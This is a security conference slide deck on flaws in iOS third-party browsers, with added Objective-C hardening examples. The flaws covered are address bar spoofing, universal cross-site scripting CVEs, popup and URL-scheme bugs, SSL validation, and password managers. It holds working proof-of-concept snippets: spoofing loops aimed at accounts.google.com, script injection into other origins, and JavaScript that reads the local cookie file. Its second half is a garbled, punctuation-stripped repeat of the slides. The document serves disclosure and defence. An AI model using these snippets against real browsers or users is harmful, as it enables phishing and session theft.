• document.write('Phishing page here'); location = 'https://accounts.google.com:8443/'; setInterval(function(){ location = 'https://accounts.google.com:8443/'; }, …)

Address Bar Spoofing: Phishing page
Title bar: <title>https://www.apple.com</title>

Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying an SSL lock makes sense only if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
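As an added example (ours, not code from the slides or from any browser named in them), a UIWebViewDelegate that follows the tips above: the address bar is refreshed from webView.request.mainDocumentURL on every delegate event, failures included, the lock is shown only after an https main document has finished loading, and on iOS 8 the same is done by observing WKWebView's KVO-compliant URL and loading properties. BrowserViewController, addressBar and lockIcon are hypothetical names.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>   // iOS 8: WKWebView, whose URL property is KVO-compliant

// Hypothetical browser view controller (all names are assumptions, not the
// deck's code). It owns a UIWebView (iOS 7) and a WKWebView (iOS 8).
@interface BrowserViewController : UIViewController <UIWebViewDelegate>
@property (nonatomic, strong) UIWebView   *webView;
@property (nonatomic, strong) WKWebView   *wkWebView;
@property (nonatomic, strong) UITextField *addressBar;
@property (nonatomic, strong) UIImageView *lockIcon;
@end

static void *kWKObservationContext = &kWKObservationContext;

static BOOL IsHTTPS(NSURL *url)
{
    // Explicit nil check: messaging nil would return NSOrderedSame (0).
    return url.scheme != nil
        && [url.scheme caseInsensitiveCompare:@"https"] == NSOrderedSame;
}

@implementation BrowserViewController

// The single place that decides what the chrome shows. The only URL worth
// displaying is the main document the web view reports *now*, never the
// request the app intended to load: redirects, document.write() into a
// freshly opened window, filtered ports and failed navigations all diverge
// from that intent.
- (void)syncChromeFromWebView:(UIWebView *)webView loadFinished:(BOOL)finished
{
    NSURL *current = webView.request.mainDocumentURL;
    self.addressBar.text = current.absoluteString ?: @"";
    // The lock is earned by a completed load of an https main document, not
    // by the scheme of a URL that is still connecting or that just failed.
    self.lockIcon.hidden = !(finished && IsHTTPS(current));
}

#pragma mark - UIWebViewDelegate (iOS 7)

- (BOOL)webView:(UIWebView *)webView shouldStartLoadWithRequest:(NSURLRequest *)request
                                             navigationType:(UIWebViewNavigationType)navigationType
{
    // Deliberately not shown in the bar: nothing has loaded yet, and showing
    // the requested URL at this point is exactly the "loading loop" spoof.
    return YES;
}

- (void)webViewDidStartLoad:(UIWebView *)webView
{
    [self syncChromeFromWebView:webView loadFinished:NO];   // new load: lock off
}

- (void)webViewDidFinishLoad:(UIWebView *)webView
{
    [self syncChromeFromWebView:webView loadFinished:YES];
}

- (void)webView:(UIWebView *)webView didFailLoadWithError:(NSError *)error
{
    // Errors resync the bar too; otherwise the URL of a navigation that never
    // happened (NXDOMAIN, closed port, SSL error) stays on screen.
    [self syncChromeFromWebView:webView loadFinished:NO];
}

#pragma mark - WKWebView (iOS 8): observe URL and loading through KVO

- (void)startObservingWKWebView
{
    for (NSString *key in @[@"URL", @"loading"]) {
        [self.wkWebView addObserver:self forKeyPath:key
                            options:NSKeyValueObservingOptionNew
                            context:kWKObservationContext];
    }
}

- (void)observeValueForKeyPath:(NSString *)keyPath ofObject:(id)object
                        change:(NSDictionary *)change context:(void *)context
{
    if (context != kWKObservationContext) {
        [super observeValueForKeyPath:keyPath ofObject:object change:change context:context];
        return;
    }
    WKWebView *wk = object;
    self.addressBar.text = wk.URL.absoluteString ?: @"";
    // Same rule as above: https scheme, navigation finished, and WebKit
    // itself reports that nothing was fetched over an insecure connection.
    self.lockIcon.hidden = !(IsHTTPS(wk.URL) && !wk.loading && wk.hasOnlySecureContent);
}

- (void)dealloc
{
    for (NSString *key in @[@"URL", @"loading"]) {
        [self.wkWebView removeObserver:self forKeyPath:key context:kWKObservationContext];
    }
}

@end
```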
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website (~ http://en.wikipedia.org/wiki/Cross-site_scripting). Famous after the PDF UXSS in 2007.
• CVE-2013-6893 UXSS in Mercury Browser for iOS
• CVE-2013-7197 UXSS in YandexBrowser for iOS
• CVE-2012-2899 UXSS in Google Chrome for iOS
• …

CVE-2013-6893: UXSS in Mercury Browser (cross-frame forgery through the tab bridge)
w = window.open('about:blank')
  —> mbexec$(WINDOW_ID) [ "command": window.open, "target": 1234 (from Math.random()), "url": about:blank ]
  —> [webView loadRequest: … "about:blank" …]
w.document.write('Hi')
  —> mbexec$(WINDOW_ID) [ "command": window.document.write, "target": 1234, "html": Hi ]
  —> [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=…></script>'); … and it just works in accounts.google.com

CVE-2013-7197: UXSS in YandexBrowser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() —> UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy: access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …@"about:blank"]]
• iOS 8: use the WKWebView UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:

Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] —> nil (URLWithString returns nil for a string it cannot parse as a URL)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) —> NULL
• Downloads opened directly from file://
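As an added example (ours, not the deck's or any browser's code), a bridge handler for a cross-tab document.write that does what the Mercury and Yandex bugs did not: it compares full origins (scheme, host, port) at the time of the write, against the target tab's current main document rather than the URL passed to window.open(), and it never hands a nil baseURL to loadHTMLString, falling back to an explicit about:blank when NSURL parsing fails. BrowserTab and TabBridge are hypothetical names; on iOS 8 the same policy belongs in the WKWebView UIDelegate's createWebViewWithConfiguration: callback.

```objective-c
#import <UIKit/UIKit.h>

// Hypothetical tab model (assumption, not from the slides): each tab owns a
// UIWebView.
@interface BrowserTab : NSObject
@property (nonatomic, strong) UIWebView *webView;
@end
@implementation BrowserTab @end

// Port normalised to the scheme default so that https://a.tld and
// https://a.tld:443 compare equal.
static NSNumber *EffectivePort(NSURL *url)
{
    if (url.port != nil) return url.port;
    NSString *scheme = url.scheme.lowercaseString;
    if ([scheme isEqualToString:@"https"]) return @443;
    if ([scheme isEqualToString:@"http"])  return @80;
    return nil;
}

// Origin = scheme + host + port; all three must match. about:blank,
// applewebdata:, file: and any other URL without a host are never "same
// origin" with a web origin. [nil isEqual:x] is NO, so an unknown scheme
// fails closed.
BOOL SameOrigin(NSURL *a, NSURL *b)
{
    if (a.scheme.length == 0 || b.scheme.length == 0) return NO;
    if (a.host.length == 0 || b.host.length == 0)     return NO;
    return [a.scheme caseInsensitiveCompare:b.scheme] == NSOrderedSame
        && [a.host caseInsensitiveCompare:b.host]     == NSOrderedSame
        && [EffectivePort(a) isEqual:EffectivePort(b)];
}

// Base URL for content the app injects itself. A nil baseURL puts the page
// into the applewebdata:// origin (file:-like, no same-origin policy), and
// -[NSURL URLWithString:] returns nil for strings it cannot parse, so the
// fallback has to be an explicit about:blank, never the nil itself.
NSURL *SafeBaseURL(NSString *candidate)
{
    NSURL *url = candidate.length ? [NSURL URLWithString:candidate] : nil;
    if (url == nil || url.host.length == 0) {
        return [NSURL URLWithString:@"about:blank"];
    }
    return url;
}

@interface TabBridge : NSObject
- (BOOL)handleDocumentWrite:(NSString *)html fromTab:(BrowserTab *)caller toTab:(BrowserTab *)target;
@end

@implementation TabBridge

// Returns YES when the write was performed, NO when it was refused.
- (BOOL)handleDocumentWrite:(NSString *)html fromTab:(BrowserTab *)caller toTab:(BrowserTab *)target
{
    // Re-read both URLs now, not at window.open(): the target may have been
    // redirected since it was opened (the Yandex pattern).
    NSURL *callerURL = caller.webView.request.mainDocumentURL;
    NSURL *targetURL = target.webView.request.mainDocumentURL;

    // A still-blank child window may be written to; anything else must be
    // exactly the caller's origin.
    BOOL targetIsBlank = (targetURL == nil)
        || [targetURL.absoluteString isEqualToString:@"about:blank"];
    if (!targetIsBlank && !SameOrigin(callerURL, targetURL)) {
        return NO;   // refused: this would be a cross-origin document.write
    }

    // The written content runs in the caller's origin, with the caller's base
    // URL: never in applewebdata://, never in the target's previous origin.
    NSURL *baseURL = SafeBaseURL(callerURL.absoluteString);
    [target.webView loadHTMLString:html baseURL:baseURL];
    return YES;
}

@end
```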
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain —> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream —> HTML
• application/other + filename .html

JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
path = path + '/Library/Cookies/Cookies.binarycookies';
x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
alert(x.responseText);
</script>

JS without Same-Origin-Policy
<script>
x = new XMLHttpRequest(); x.open('GET', 'https://yourintranet', false); x.send();
alert(x.responseText);
</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
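The two web-view-level options from the list above, as an added example (ours, not code from the deck): the downloaded file is rendered as text/plain with an explicit about:blank base URL on UIWebView, or, where it must render as HTML, in an iOS 8 WKWebView whose preferences have JavaScript switched off. fileURL is assumed to point at a file the browser itself downloaded.

```objective-c
#import <UIKit/UIKit.h>
#import <WebKit/WebKit.h>

// iOS 7 / UIWebView: hand WebKit the bytes as text/plain so markup is shown
// as text rather than parsed as a document, and pin the base URL to
// about:blank. A nil baseURL would land the content in the applewebdata://
// origin; a file:// baseURL would give it file-origin access to the sandbox.
BOOL LoadDownloadedFileAsText(UIWebView *webView, NSURL *fileURL, NSError **error)
{
    NSData *bytes = [NSData dataWithContentsOfURL:fileURL options:0 error:error];
    if (bytes == nil) return NO;
    [webView loadData:bytes
             MIMEType:@"text/plain"
     textEncodingName:@"utf-8"
              baseURL:[NSURL URLWithString:@"about:blank"]];
    return YES;
}

// iOS 8 / WKWebView: a dedicated preview view with scripting disabled for
// content that has to be rendered as HTML. Assumed helper name.
WKWebView *MakeScriptlessPreviewWebView(CGRect frame)
{
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    config.preferences.javaScriptCanOpenWindowsAutomatically = NO;
    return [[WKWebView alloc] initWithFrame:frame configuration:config];
}

// Even with JavaScript off, keep the base URL explicit: the origin a
// document ends up in is decided by baseURL, not by the preferences.
BOOL PreviewDownloadedHTML(WKWebView *previewView, NSURL *fileURL, NSError **error)
{
    NSString *html = [NSString stringWithContentsOfURL:fileURL
                                              encoding:NSUTF8StringEncoding
                                                 error:error];
    if (html == nil) return NO;
    [previewView loadHTMLString:html baseURL:[NSURL URLWithString:@"about:blank"]];
    return YES;
}
```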
Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com"><iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes: Application (bolted-on), Native (WebKit), Bridge (internal), Registered (external)
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http%, http%5, http%5c, etc.
• Example: Opera Coast: <script>document.location = 'http%5c'</script>
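As an added example (ours, not Opera's or the deck's code), the check that prevents the crash described above: CFURLCreateWithString() returns NULL for strings it rejects, such as the malformed percent escapes the slide lists, and every CFURL accessor dereferences its argument, so the NULL has to be caught before the URL reaches CFURLCopyPath() or any other CFURL call. CopyPathOrNull and IsParseableURL are hypothetical helper names; the inputs in main() are constructed to mirror the slide.

```objective-c
#import <CoreFoundation/CoreFoundation.h>

// Returns the path component of `urlString`, or NULL when the string is not
// a URL CFURL can parse. Never passes NULL on to a CFURL accessor.
CFStringRef CopyPathOrNull(CFStringRef urlString)
{
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault, urlString, NULL);
    if (url == NULL) {
        // Unparseable URL: refuse it here instead of letting CFURLCopyPath()
        // fault at address 0x0 as in the Opera Coast backtrace on the slide.
        return NULL;
    }
    CFStringRef path = CFURLCopyPath(url);   // may itself be NULL (no path)
    CFRelease(url);
    return path;   // caller releases
}

// The same gate phrased as the question a URL handler really asks before
// dispatching to native code: can this string be turned into a CFURL at all?
bool IsParseableURL(CFStringRef urlString)
{
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault, urlString, NULL);
    if (url == NULL) return false;
    CFRelease(url);
    return true;
}

int main(void)
{
    // Constructed inputs: one well-formed URL and the slide's malformed
    // percent-encoded strings.
    CFStringRef inputs[] = {
        CFSTR("http://example.com/a/b"), CFSTR("http%"), CFSTR("http%5"), CFSTR("http%5c")
    };
    for (size_t i = 0; i < sizeof(inputs) / sizeof(inputs[0]); i++) {
        CFStringRef path = CopyPathOrNull(inputs[i]);
        if (path != NULL) {
            CFShow(path);
            CFRelease(path);
        } else {
            CFShow(CFSTR("rejected: not a parseable URL (or no path)"));
        }
    }
    return 0;
}
```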
Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()
• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript runs with the privileges of the top frame —> passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
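As an added example (ours, not code from the deck or from any password manager named in it), a save and fill policy that closes the two gaps listed above: the origin a credential is saved under comes from the web view's own main document URL, never from page-supplied data, and a fill requires scheme, host and port to match, so a password saved on https is never typed into the http version of the same host. SavedCredential and the helper names are hypothetical; login.example is a constructed host.

```objective-c
#import <UIKit/UIKit.h>

// Hypothetical credential record keyed by full origin (type and fields are
// assumptions, not from the slides).
@interface SavedCredential : NSObject
@property (nonatomic, copy)   NSString *scheme;   // "https"
@property (nonatomic, copy)   NSString *host;     // "login.example" (constructed)
@property (nonatomic, strong) NSNumber *port;     // explicit or scheme default
@end
@implementation SavedCredential @end

static NSNumber *DefaultPortForScheme(NSString *scheme)
{
    NSString *s = scheme.lowercaseString;
    if ([s isEqualToString:@"https"]) return @443;
    if ([s isEqualToString:@"http"])  return @80;
    return nil;
}

// Origin of the document the web view is showing right now, taken from the
// web view itself. Page content (form actions, hidden fields, messages from
// another tab) gets no say in which origin a password is filed under, which
// is what "force saving a password for another domain" relies on.
// Returns nil for about:blank, file:, applewebdata: and other host-less URLs.
SavedCredential *OriginOfCurrentDocument(UIWebView *webView)
{
    NSURL *doc = webView.request.mainDocumentURL;
    if (doc.scheme.length == 0 || doc.host.length == 0) return nil;
    SavedCredential *o = [SavedCredential new];
    o.scheme = doc.scheme.lowercaseString;
    o.host   = doc.host.lowercaseString;
    o.port   = doc.port ?: DefaultPortForScheme(doc.scheme);
    return o;
}

// Whether `cred` may be filled into the document currently shown. Scheme and
// port are compared as well as the host: a credential saved on
// https://login.example must not be filled into http://login.example, where
// anyone on the path can read it. Filling happens only once the load has
// finished, i.e. once the URL above is the document the user actually sees.
// (The injected JavaScript runs in the top frame only, so forms in subframes
// never receive the fill; that matches the behaviour described on the slide.)
BOOL ShouldAutofill(SavedCredential *cred, UIWebView *webView, BOOL loadFinished)
{
    if (cred == nil || !loadFinished) return NO;
    SavedCredential *now = OriginOfCurrentDocument(webView);
    if (now == nil) return NO;
    // [nil isEqual:nil] is NO, so an unknown scheme with no port fails closed.
    return [now.scheme isEqualToString:cred.scheme]
        && [now.host   isEqualToString:cred.host]
        && [now.port   isEqual:cred.port];
}
```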
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec
• http://www.w3.org/TR/CSP
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews
• http://www.shmoo.com/idn
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com
• https://ios.browsr-tests.com
Questions?
lukaszpilorz@runic.pl, pawelwylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
